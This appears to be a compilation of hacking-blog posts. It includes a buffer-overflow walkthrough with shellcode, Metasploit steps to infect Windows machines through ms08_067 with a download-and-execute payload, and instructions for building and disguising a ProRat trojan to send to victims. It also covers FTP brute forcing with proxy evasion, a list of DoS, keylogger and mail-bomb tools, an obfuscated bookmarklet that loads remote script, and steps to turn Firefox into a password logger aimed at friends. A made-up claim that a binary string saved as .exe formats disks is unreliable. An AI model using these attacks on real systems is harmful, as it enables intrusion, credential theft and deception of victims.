The NOPSLED is a chain of 0×90′s (NOPSLED = NO OPeration) so the NOPSLED will be placed before our shellcode.
The NOPSLED helps us so we don’t have to jump exactly to the place in memory where our shellcode begins.


———- exploit.c ————–
#include <stdio.h>
#include <string.h>


char exploit[2048];

int main(void)
{
int i;
/*
* (linux/x86) eject cd-rom (follows “/dev/cdrom” symlink) + exit() – 40 bytes
* – izik <izik@tty64.org>
*/
char shellcode[] =
“\x6a\x05″ // push $0×5
“\x58″ // pop %eax
“\x31\xc9″ // xor %ecx,%ecx
“\x51″ // push %ecx
“\xb5\x08″ // mov $0×8,%ch
“\x68\x64\x72\x6f\x6d” // push $0x6d6f7264
“\x68\x65\x76\x2f\x63″ // push $0x632f7665
“\x68\x2f\x2f\x2f\x64″ // push $0x642f2f2f
“\x89\xe3″ // mov %esp,%ebx
“\xcd\x80″ // int $0×80
“\x89\xc3″ // mov %eax,%ebx
“\xb0\x36″ // mov $0×36,%al
“\x66\xb9\x09\x53″ // mov $0×5309,%cx
“\xcd\x80″ // int $0×80
“\x40″ // inc %eax
“\xcd\x80″; // int $0×80

for(i = 0; i < 512; i++)
strcat(exploit, “0×90″);

strcat(exploit, shellcode);

printf(“Loaded.\n”);

return 0;
}
———- exploit.c ————–

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.


Run our vuln program so we could find the RET, the address of our shellcode.
After we run it, we’ll look for the ESP – the ESP points on the last element used on the stack.
Check this out:


niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x60′`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type “show copying” to see the conditions.
There is absolutely no warranty for GDB. Type “show warranty” for details.
This GDB was configured as “i486-linux-gnu”…
Using host libthread_db library “/lib/tls/i686/cmov/libthread_db.so.1″.
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e ‘print “A”x60′`
Starting program: /home/niv/Desktop/bof `perl -e ‘print “A”x60′`


Program received signal SIGSEGV, Segmentation fault.
0×41414141 in ?? ()
(gdb) x/s $esp


You’re gonna get these things:

0xbf949694: “`???}_???o??02″
(gdb)
0xbf9496a2: “”



etc’…
Keep searching until you see something like this thing:

0xbf9496e0:”7?\224?J?\224?U?\224?i?\224?y?\224??\224?02?\224?24?\224?*?\224?3?\224???\224??\224?\v?\224?30?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?25?\224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?24?\224?P?\224?p?\224?}?\224?\212?\224???\224??\224?”



0xbf9496e0 is the address of our shellcode (the RET)
To make our exploit work properly, we need to overwrite the EIP with our shellcode.We’ll take our old address (0xbf9496e0) and do this thing:

Take our address and make it look this way: bf 94 96 e0
Grab the last bytes (e0) and do the following:
we’ll block the characters between \’s (slashes), add x in each block -> \xe0\
you’ll do the same to each 2 chars and then put them in order that the last bytes of our the address will be the first one in our new address:

0xbf9496e0 -> \xe0\x96\x94\xbf



Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A’s),
and our RET’s length is 4 bytes we are gonna subtract the length of our shellcode address(the RET) of the A’s,
and we are gonna print 28 A’s (32 A’s – 4 bytes (RET’s length) = 28) and the RET so we could reach the shellcode successfully.

niv@niv-desktop:~/Desktop$ ./bof `perl -e ‘print “A”x28′“printf
“\xbf\x94\x96\xe0″`

HOW TO OPTIMIZE BROADBAND & DSL CONNECTIONS SPEED

These settings allow you to boost the speed of your broadband Internet connection when using a Cable Modem or DSL Router with Windows 2000 and Windows XP.


Open your registry and find the key below.

Create the following DWORD values, as most of these values will not already exist you will need to create them by clicking on ‘Edit -> New -> DWORD Value’ and then set the value as shown below.

DefaultTTL = “80″ hex (or 128 decimal)
Specifies the default time to live (TTL) for TCP/IP packets. The default is 32.

EnablePMTUBHDetect = “0″
Specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. The default is 0.

EnablePMTUDiscovery = “1″
Specifies whether the TCP/IP stack will attempt to perform path MTU discovery as specified in RFC 1191. The default is 1.

GlobalMaxTcpWindowSize = “7FFF” hex (or 32767 decimal)
Specifies the system maximum receive window size advertised by the TCP/IP stack.

TcpMaxDupAcks = “2″
Determines the number of duplicate ACKs that must be received for the same sequence number of sent data before “fast retransmit” is triggered.

SackOpts = “1″
Enables support for selective acknowledgements as documented by Request for Comment (RFC) 2018. Default is 0.

Tcp1323Opts = “1″
Controls RFC 1323 time stamps and window scaling options. Possible values are: “0″ = disable RFC 1323 options, “1″ = window scale enabled only, “2″ = time stamps enabled only and “3″ = both options enabled.

TcpWindowSize = “7FFF” hex (or 32767 decimal)
Specifies the receive window size advertised by the TCP/IP stack. If you have a latent network you can try increasing the value to 93440, 186880, or 372300.

Exit your registry and restart Windows for the changes to take effect.

If you don’t want to edit the registry, here’s a little TCP utility that is ideal…

http://www.broadbandreports.com/front/doctorping.zip

HOW TO CREATE A VIRUS IN WINDOWS

Here I am gonna tell you that how to create a simple virus in the Windows operated computer systems. It is a very simple trick and you can do it in just a minute.

HOW TO : Create A Virus In Windows


1. Copy the number given below and paste it in a Notepad file

01001011000111110010010101010101010000011111100000

2. Now save the file as any name and put the extension as .exe like, ‘whateveryouwish.exe’

3. When somebody opens this file then, the hard disc format will format.

For more fun, you can keep this file in any computer, which you can access, in a far-off folder. For that first of all rename the file and make a shortcut to desktop. Now, just hide the original file and change the icon of the shortcut to that of My Computer, My Documents or any popular icon. And rename it according to that and delete the original icon and link from the desktop. Now when someone will try to open it then hard disk will format…

HACK THE GAME – LEARN HACKING WITH IT

Hack The Game is a small size and free game which will let you enjoy the real world of hacking. It gives you DOS environment to play which will make you feel that you are really hacking something. It is also having lots of sounds for typing and several warning announcement which makes the gaming experience more realistic.

Download HACK THE GAME


After downloading, just start it, select your language and input any ID you may like. You will find many missions in this game, briefing of each mission will be available in your inbox. The mail itself includes several hints and processes on how to hack. You can also check Settings to turn off the sounds and warning messages etc.

The best thing is that no installation is needed to run this game and it is totally safe to play as it utilizes local files which in game play acts as a remote files. So, you just don not need to worry about your security. If you are having doubt about it, then just play it offline…. Enjoy

CREATING TROJAN BINARY USING METASPLOIT

Learn how to create a standalone Trojan binary using the Metasploit Framework. We use msfpayload option to output raw data, which we then encode via msfencode. Finally, we pipe it to a new executable file.

Watch Video

BACKBOX LINUX 1.05 – DOWNLOAD

BackBox is a Linux distribution based on Ubuntu Lucid 10.04 LTS developed to perform penetration tests and security assessments. Designed to be fast, easy to use and to provide a minimal yet complete desktop environment thanks to its own software repositories always been updates to the last stable version of the most known and used ethical hacking tools.
This is the official change log:
New ISO image (32bit & 64bit)
System upgrade
Performance boost
New look and feel
Improved start menu
Bug fixing
Hacking tools new or updated: Firefox 4, Hydra 6.2,kismet 2011.03.2, Metasploit Framework 3.6.0, NMap 5.51,SET 1.3.5,Wireshark, W3af 1.0

  Download BackBox Linux 1.05 from here: http://www.backbox.org/content/download

METASPLOIT FRAMEWORK V3.7.0 RELEASED – DOWNLOAD

The Metasploit team has spent the last two months focused on one of the least-visible, but most important pieces of the metasploit Framework; the session backend. Metasploit 3.7 represents a complete overhaul of how sessions sre tracked within the framework and associated with the backened database. This release also significantly improves the staging process for the reverse_tcp stager and Meterpreter session initialization. Shell sessions now hold their output in a ring buffer, which allows us to easily view session history — even if you dont have database.
This release also includes a long-awaited update to our SMB stack to enable signing.
Thanks to some great work by Alexandre Maloteaux, you can now perform pass-the-hash and stolen password attacks against Windows 2008. Alexandre also added NTLM authentication support to the Microsoft SQL Server driver within Metasploit.


In addition to the core library improvements, this release comes with 35 new remote exploits thanks in large part to our two newest full time developers, bannedit and sinner.

Download Metasploit Framework 3.7.0 from here: http://www.metasploit.com/download/

RAWCAP – A COMMAND LINE NETWORK SNIFFER FOR WINDOWS

RawCap is a free command line network sniffer for Windows that users raw sockets. This means that you wont need external drivers such as WinPcap anymore! It can also sniff WiFi networks! All
this in a file that is just 17kb.



You might ask what good this might do to me. The answer is simple. If you find a way to compromise a perimeter devices running Windows, you can upload this small utility there and then view the dump file at your own leisure to sniff their internal traffic! Since it works at the raw sockets, you can sniff anything – right from a SSL connection to WPA2 encrypted WiFi conection. This can helpful to incident responders and penetration testers at the same time.
Features of RawCap:
Can sniff any interface that has got an IP address, including 127.0.0.1 (localhost/loopback)
RawCap.exe is just 17 kB
No external libraries or DLL’s needed other than .NET Framework 2.0
No installation required, just download RawCap.exe and sniff
Can sniff most interface types, including WiFi and PPP interfaces
Minimal memory and CPU load
Reliable and simple to use
You will need to have administrator privileges to run RawCap. Additionally, it might not run on a Windows 7 or Windows Vista machine.


or simply run


RawCap.exe 192.168.0.17 dumpfile.pcap

This tool has been currently tested on Windows XP.

Download RawCap from here: Rawcap

ARMITAGE 03.16.11 – CYBER ATTACK TOOL FOR METASPLOIT

This is the change log:
Shell-> Disconnect now executes in a separate thread.
Armitage now creates ~/armitage-tmp and writes there if the current dir is/Applications or it can’t write to thr current directory.
Fixed a potential deadlock issue in the file browser
Directory up button in file browser now shows that it has been pressed
Added Execute option to file browser(now you can run a program by right-clicking on it and selecting Execute-for Jesse)
Multiple improvements to responsiveness of command shell and meterpreter tabs. This should benefit collaboration mode too.

Download Armitage from here: download

IMMUNITY DEBUGGER V1.82 – TOOL TO WRITE EXPLOITS, ANALYZING MALWARE & REVERSE ENGINEERING

Immunity Debugger is a powerful way to write exploits,analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing,the industry’s first heap analysis tool built specifically for heap creation,and a large and well supported Python API for easy extensibility.


Features:
A debugger with functionality desugned specifically for the security industry
Cuts exploit development time by 50%
Simple,Understandable interfaces
Robust and powerful scripting language for automating intelligent debugging
Lightweight and fast debuggung to prevent corruption during complex analysis
Connectivity to fuzzers and exploit development tools
Better handling of breakpoints.
Fix thread suspend issues while handling breakpoints
Reintroduced the Python shell
Fixed python tracebacks to work again.

Download Immunity Debugger from here: Download

ARMITAGE – CYBER ATTACK MANAGEMENT TOOL FOR METASPLOIT

Armitage is a cyber attack management tool for metasploit that visualizes your targets, recommends exploits,and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features,Armitage can help us.



Requirement to install Armitage:
Java 1.6.0+
Metasploit 3.5+
A database and the information to connect to it

Download Armitage from here: http://www.fastandeasyhacking.com/download

HOW TO HACK A COMPUTER USING NMAP & METASPLOIT – INFECTING THROUGH IP ADDRESS

Requirements:


Nmap
Metasploit

First of all you need target ip of your slave.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]
Next you need to type db_nmap -sT -sV

[This’ll scan OS, Ports, and Services running on slave’s computer.]

Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on slave’s computer.

Now it’s time to exploit slave’s machine.

Exploit depends on the OS, Ports, and Services running on slave’s computer.

So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.

No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0

[Use: This’ll set target to 0 specified]

Then type show payloads

[Use: This’ll bring up all the payloads]

Next type set payload windows/download_exec

[Use: This’ll set payload as windows/download_exec]

Then Type show options

[Use: This’ll show all options in the exploit & payload]

In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST
[Use: This’ll set RHOST (slave’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL [content suppressed]
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your slave will be infected.]

You can now control you’re slave with RAT.

So, any versions of Win 2000-XP can be exploited easily.

In case if you didn’t get this two OS’, immediately after Nmap scan

You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Good Luck!

WINAUTOPWN – VERSION 2.4 – DOWNLOAD

This is to announce release of winAUTOPWN version 2.4…


winAUTOPWN is an auto (hacking) shell gaining tool. It can also be used to test IDS, IPS and other Monitoring sensors/softwares…

Download from here

WHAT ARE DICTIONARY ATTACKS

You must first know what an FTP server is. FTP stands for File Transfer Protocol. FTP is a simple way to exchange files over the internet. If a hacker got FTP access to my website, he could delete/upload anything he wants on my server. An FTP address looks similar to a website address except it uses the prefix ftp:// instead of http://. I set up an FTP server on my computer so I could demonstrate. You can get Brutus at here.

1. First the hacker would choose a target. In this case it’s my home computer and the IP address for your home computer is 127.0.0.1 .

2. By going to ftp://127.0.0.1 I get a pop-up box asking for a username and password.


3. Next the hacker would launch a program similar to Brutus and attempt to crack the password.
4. In the target you put the IP address of the website and to the right select the appropriate option, which in this case is FTP.


5. The default port is 21 but some websites change this to make them a little more secure. If you find out that the port isn’t 21, you can find the right one by doing a port scan. We will get into this later in the book.
6. If you don’t know any of the usernames for the FTP server, then you will have to get a list of the most common usernames.

 7. For a dictionary attack you will have to choose the pass mode Word List and browse and select the file containing your word list. You can get some good password lists at http://packetstormsecurity.org/Crackers/wordlists/

8. Once you hit Start the program will attempt to connect to the server and begin to try all the possible combinations from your lists.


9. If you’re lucky, eventually it’ll get the right Username:Password combination.


10. A smarter hacker would use a proxy when using a program like this. What a proxy does is cloaks your IP address by sending your connection request through another computer before going to the target. This is a smart idea because as you will see in the image below, Brutus leaves a huge log of your presence on the target server.


11. In place of the IP address 127.0.0.1 would be the hackers IP address. Footprints like these get a hacker caught and into a lot of trouble with the law.

PRORAT – TROJAN

To show you an example of a malicious program, I will use a well known Windows Trojan, ProRat.


1. Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be “pro”.

2. Open up the program


3. Next we will create the actual Trojan file. Click on Create and choose Create ProRat Server.

4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.



5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.



6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document.


7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but exe’s looks suspicious so it would be smart to change it.



8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.


9. Finally click on Create Server to, you guessed it, create the server file.


10. A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.
11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.
12. I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it.


13. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more.


A hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

BANNER GRABBING

Now that the hacker has a full list of services running on the target system, to be able to exploit them, he has to first figure out what software and version the service is. One way the hacker can get this information, is to telnet into service port. In the example below, we will use command prompt on Windows (Start -> Run -> Type “cmd” -> Enter). If you are on a Mac, you will be using the terminal. Note: If you are using Windows Vista, then telnet is not installed by default. You can install it by doing the following simple steps.

o Click Start then select Control Panel.
o Select Programs and Features.
o Select Turn Windows features on or off.
o Select the Telnet Client option and click OK.
o A box will appear to confirm installation. The telnet command should now be installed


1. First, the hacker would choose one of the open ports that were revealed in the Nmap scan to continue with and attempt to exploit. Let’s say that when the hacker scanned his target, he found the port 21 open. As you can see on the chart above, port 21 is FTP. To find out what FTP software is running he would use telnet by running the command:
telnet www.targetsite.com 21



I ran this against my computer (localhost). So a hacker would insert a target URL in place of localhost.

2. Next, it would connect to the target and display a banner telling the hacker the software and its version as shown below. This is the information the hacker needs to continue and begin searching for vulnerabilities for the software discovered.


If the above method doesn’t work for you, then simply use Nmap’s full version detection option to get the information.

OFFENSIVE TOOLS


This package contains many applications but its main focus is on “Denial of Service” on HTTP servers.
Click here to download.
Password = chloe
Please view the readme.txt

http://bit.ly/k11swm

ALL IN ONE HACKING SOFTWARES TOOLS PACK – DOWNLOAD

Hello friends, today i am introducing you a ultra hacker kit special, it consists of more than 150 working hacking tools.
Note: This material is posted for educational purposes only!
Hacking in any form is punishable offense. This material may be used by you only for the study of vulnerabilities, and nothing more.

This Package Includes:
AddrView
AddrView gives you the ability to analyze HTML pages and extract most of the address URL, contained in them. AddrView retrieves the URL of images (img – tag), links to other files (a – a tag), CSS files, frames, Flash files and more. You can save the extracted addresses list to text files, HTML or XML files, or add these addresses to the hut.


AnonFTP
This package contains / var / ftp area for anonymous FTP access.

AppToService
The program enables the command line to run regular applications as a service (service).
However, to install any application as a service is completely free – just enough to take the recommendations of the Windows XP FAQ.

arpinject
Any computer on the network can be easy to take and send a packet ARP_REPLAY. And thus make changes to the ARP table. Such an attack is called ARP Poisonig. Its result – redirect traffic to the desired host. Send the packet (s) can be programmatically by using a tool ARPInject.

aspack21
Very nice wrapper *. exe and *. dll files (in some cases the degree of compression is 70%). In addition, the program is good (especially for programmers who are trying to protect their trousers) the complexity of extracting compressed file. I understand that he ASPack packed ASPACK’om same Not bad, and that the program allows you to check before final packing job “prepackaged” exe-file, in violation of its normal operation, uncompress.
The new version has improved the speed of packing and adds an option “maximum compression”. In unreported as the program runs 30 days. The interface is multilingual, including in Russian.

bios_pass_remover
Remove BIOS password

brutus
Brootforce xs which

Cable Modem Sniffer
Traffic interceptor cable modem

CapKeys_DIGITAL
Key update einfach per internet. abspeichern als SofCam.key und als textdatei moglich.

CGI Founder v1.043
Program for finding holes in CGI scripts.

CGISscan
Scanner CGI scripts

cports
Viewing connections and listening ports on your computer

craagle
The program for the automated search every seriynkov and keygens on many relevant archives.

CreditCardGjenerator

DeepUnFreez
“Makes computing environments easier to manage and maintain. Every Restart destroys all changes and reboots the computer to its original state, right down to the last byte”

E-mail Cracker
Recover forgotten mailbox passwords that are stored in the e-mail client. The program emulates the server POP3, and the password is sent back to the user. It supports any email client POP3.

ezDataBase_Defacer
Defeyser engine ezDataBase

FTP Brute Forcer
Brootforce FTP

ftpbr
Brootforce FTP

~ Censored ~ Mail Bomber 2.3
Bomer soap

G00B3RS_phpBB_exploit_pack
Pak exploits for phpBB Motor

Google_Hacker_1.2
Utility to help with queries from the series guglhak

grinder1.1
It helps you find instructions in the file specify the range of IP-address.

HackersAssistant
Software package for a hacker: Port Scanner, Ping Flooder, Server Slower, Connections, File Cleaner, Get Passwords, IP Validator, Web Browser, Ip Information, HTML Stealer, Site IP Retrieval, Winsock Scanner, exe Corruptor, Nuker, Hit Increaser, File Generator, Anonymous e-mail, Whois, Binary

HackTheGame
HackTheGame this game simulator life hacker. In which you take on the role of a hacker. Which xs for what and how to break the system. Join showdown with hack portals, in general, live a long and merry life. The main thing is not to get caught would be rubbish.

Hotmail Email Hacker / Hotmail HAcker Gold / Hotmail ScamPage / HotmailHack
In my still some sort of a heresy, not long running, hotmylo not so easy to hack

hydra-4.6-win
THC-Hydra – threaded cracker passwords to various services (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO, etc.) for UNIX platforms. With this tool you can attack several services at once.

iecv
Internet Explorer Cookies View

ipnetinfo
The program, which displays information about IP address. It allows you to display detailed information concerning the country, the owner of the domain, the range of available IP addresses, contact information and much more. This tool will be useful, for example, when you need to know the origin of the mail received from an unknown destination. For this is enough simply to copy the message headers from your email program IPNetInfo. It will extract itself from the text of all IP addresses and make the necessary search. The software uses several Whois servers, thereby maximizing the impact of the search for a specific network address. Among other things, it allows you to create HTML report, which stores all necessary information about the selected IP addresses.

john-17w
password cracker, currently available for UNIX, DOS, Win32. Its main aim is to detect weak passwords UNIX. To the program you can buy a collection of word lists over 600 MB, with the help of which greatly simplifies the selection of passwords.

Key Changer
Commercial ($ 8.00) is free from trojans, designed to find and change the product key, Windows XP, such as piracy on the validity (if any). XP Key Changer after launch, finds the proposed changes to the key, and the name and organization registered in the system provided by Windows XP. Program XP Key Changer allows you to change XP Product Key and all this information, one click on all machines. Works with all service packs, including Windows XP SP3!

Key_Logger
keylogger R)

Legion NetBios Scanner v2.1
Scanner NEtBios Resources

Mail Boomb_2.0 YAHOO
Bomber soaps Yahoo

MooreR Port Scanner
Port scanner on the remote machine

MSN Flooder 2.0
Fluder messenger msn

NET BIOS Scanner
Scanner NEtBios Resources

NetBIOS Name Scanner
Scanner NEtBios Resources

NetResView
Scanner NEtBios Resources

NFO Maker 1.0
This plugin is for viewing nfo and diz files, which are usually located in the downloaded archive.
Warning: as reported by the author, “Unfortunately there was an unfortunate mistake. Setting.reg File added to the archive with the plugin. Setting.reg file separately can be downloaded here http://issoft.narod.ru/downloads/setting.reg

Nimda
“Nimda” is an Internet worm that spreads via the Internet as a file attachment in an e-mail, local area networks, as well as penetrating the unprotected IIS-servers. The original host file has the name of the worm README.EXE and is a program format Windows PE EXE, the size of about 57 kilobytes, and is written in Microsoft C + +.

NTPacker
Packer files

On-Off MSN
What is vklyuchalka vyklyuchalka MSN

PCAnyPass
PCAnywhere PassView Image of passwords with asterisks

Php Nuke Hacker v11.0
Burglar engine php nuke

phpBB Annihilator / phpbb attack / phpbb bruteforcer / PhpBB pass extractor / phpBB_DoS / phpbb_spammer / phpBBAttacker / phpBBcracker
A set of tools for hacking, spam, flood, ddos, Brutus phpBB

PhpBuGScan
Scanner bugs in scripts nxn

Ping & Nukes
pinger \ nyuker

Listener XP
The program allows to monitor network ports on your system, generating a pop-up window when trying to access the port. The program writes a log file of IP-addresses of connectable clients and sends you a request for permission to use it. You can enter the port numbers of their choice, or the program will prompt you to the default list. The program runs from the system tray.

pqwak2
This program for the selection of network paroley.Dostatochno quickly picks up a password on the specified drive on the network.

procexp
PROCEXP displays information about the processes of loading dynamic libraries and their svoystvah.Eto makes PROCEXP m schnym tool for understanding the internal behavior of applications as trace information leakage marker and DLL, version mismatch. And even the indirect determination of viruses.

ProxyPro
Scan, ping, proxy switches

rainbowcrack-1.2-src win-lin
The program allows you to create a predsgenerirovannyh LanManager hashes, with which you could almost instantly to crack almost any alphanumeric password.

Remote Shut Down
Vykyuchenie remote machine

ResHacker
Correction exe and dll files. Much can change in them. With this program you can easily Russify program.

RpcScan101
Network port scanner

Sasser
Sasser virus looks like the exhausted millions of Internet users worldwide in summer 2003 lovesan (blaster). Already, he has several of its modifications, which experts say is even more harmful than the original. The same way according to experts, this virus does not pose a threat to your hard drive, but only prevents the use of them fully functional. Its distinctive features – a message appears on trying to connect to the ip address of another computer and the error message LSA Shell (Export version) and follows it to restart the computer from a fatal error process lsass.exe

SendMailer
Sends a message in HTML format and in any encoding without mail client. Checks completion of mandatory fields. Checks E-Mail on the right (syntax). Converts special characters into HTML format. Allows you to specify multiple addresses to choose from. Checks sent and reports errors. Ability to send a copy to the sender. Very easy to configure. Also fits easily into any design. Gives ample opportunity to hide the real address. If desired, sends information about the browser and the IP address

Server 2003 Keygen
keygen for WINDOWS 2003 server

Server Killer
Ubiytsa servers R)

showpassv10
Opening a password for zvezdochkmi

sitedigger2
The program looks in the cache of Google potential vulnerabilities, errors, configuration problems on Web sites. The new version of the new version you can use FSDB / GHDB and generate 10 results for each signature. Posted as a large number of new signatures – open webcams, credit card numbers, etc.

SMBdie
WinNuke back! Introducing exploit completely kills or WinNT/2K/XP. NET machine with Network Share Provider (works on 139 and / or 445 port). Uses a malformed SMB (Server Message Block) packet is used anonymously, no account do not need to know – for only the IP address and computer name.

SQLScan v1.0
Utility guessing the password to Microsoft SQL server. Lets you scan a range of IP addresses. When backwater password creates an NT account with a blank password on a vulnerable system.

Stealth – HTTP Scanner v1.0 build 23
powerful tool for auditing security Web server, which looks at more than 19.000 vulnerabilities.

SuperScan4
Port scanner with a bunch of utilities. Also there is a useful utility that pulls out from companies (windows) all of the available Old using zero session.

tftpd32.273
a small freeware program, which includes simple to configure DHCP, TFTP, SNTP and Syslog servers as well as TFTP client

traceroute
This is a utility computer program designed to identify routes data networks TCP / IP.

udpflood
UDP packet sender. Tool flood UDP packets to specified IP and port. Used to test the stability of network services to a UDP flood. Packages can be specified by the user or be completely random.

Ultra Dos
Program for DDOS remote machine

WebCracker 4.0
Cute program to guess passwords for sites.
and much more…

Hotfile
Fileserve

WOPHCRACK – AN OPHCRACK WEB INTERFACE

Rainbow tables are really useful when cracking password hashes. One Disadvantage of these tables is their size which can get up to tens and even hundreds of gigs. Making use of these rainbow tables is even difficult as it takes quiet a long time to go through all of the content of the table.Hence, there are tools like Ophcrack for Windows that help us crack windows passwords with rainbow tables.

We really liked the Offensive security Crackpot online hash cracker and thought it would be really nice to have a web interface for our rainbow tables that we could access from anywhere without having to carry them with us!

Download here: WOPHCRACK

CROSS_FUZZ – A CROSS DOCUMENT DOM BINDING FUZZER

Cross_fuzz is an amazingly effective but notoriously annoying cross-document DOM binding fuzzer that helped identify about one hundred bugs in all browsers on the market-many of said bugs exploitable and it is still finding more…

Download it from here: cross_fuzz

HOW TO REMOVE SURVEYS & OFFERS FROM WEB PAGES


COPY THIS CODE, PASTE IT INTO UR BROWSER’S ADDRESS BAR & PRESS ENTER:-

javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]](“null”,1);eval(“delete clear”+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)==”undefined”){var ar=document.createElement(“iframe”);ar.style.displ
ay=”none”;document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99999;j–)window["clear"+z[i]](j);}})();var bd=”[url]http://survey-remover.com/[/url]“;var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n=”";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122));return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])==”function”){if((window[j]+”").indexOf(“function set”+sj[i]+”() {“)!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:”2.0″,domain:”http://survey-remover.com/“,id:”4dd59e37064d7″,TO:setTimeout(“alert(\”It appears that the host could not be reached \nPlease try to use the bookmarklet again later!\n\”+xjz.domain);”,10000)};var a=document.createElement(“script”);a.type=”text/javascript”;a.src=xjz.domain.replace(“//”,”//public.“)+”remover/”;a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.init();};document.documentElement.firstElementChild.appendChild(a);};window[xc[0]](window[er],110);})();

OR VISIT http://survey-remover.com/ AND DOWNLOAD THE TOOLS…

HOW TO TURN YOUR MOZILLA FIREFOX INTO A KEYLOGGER

How we can turn our Mozilla Firefox into an undetectable keylogger. This keylogger will be used to store all the usernames and passwords that will be entered by the user. So that you can hack or audit for ethical reasons your friends accounts.


No additional software or tool is required just need to replace it with existing one.
Steps to Turn Your Firefox Into A KeyLogger
Close Firefox Application if open
Go to: Windows- C:/Program Files/Mozilla Firefox/Components
Find The Script Named ” nsLoginManagerPrompter.js”
Click here to download the file unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one already edited to save all usernames and passwords with user intimation.
From now on, when someone logs onto any site, they username and passwords will bw saved automatically, without prompt!


To retrieve the account information, make sure Firefox is opened, go to Tools > Options > Security Tab > click on saved passwords, then click on show passwords, and press yes…

WHAT IS GREASEMONKEY


https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

Greasemonkey is a Mozilla Firefox extension that allows users to install scripts that make on-the-fly changes to HTML web page content on the DOMContentLoaded event, which happens immediately after it is loaded in the browser (also known as augmented browsing).

As Greasemonkey scripts are persistent, the changes made to the web pages are executed every time the page is opened, making them effectively permanent for the user running the script.

Greasemonkey can be used for adding new functions to web pages (for example, embedding price comparisons within shopping sites), fixing rendering bugs, combining data from multiple webpages, and numerous other purposes.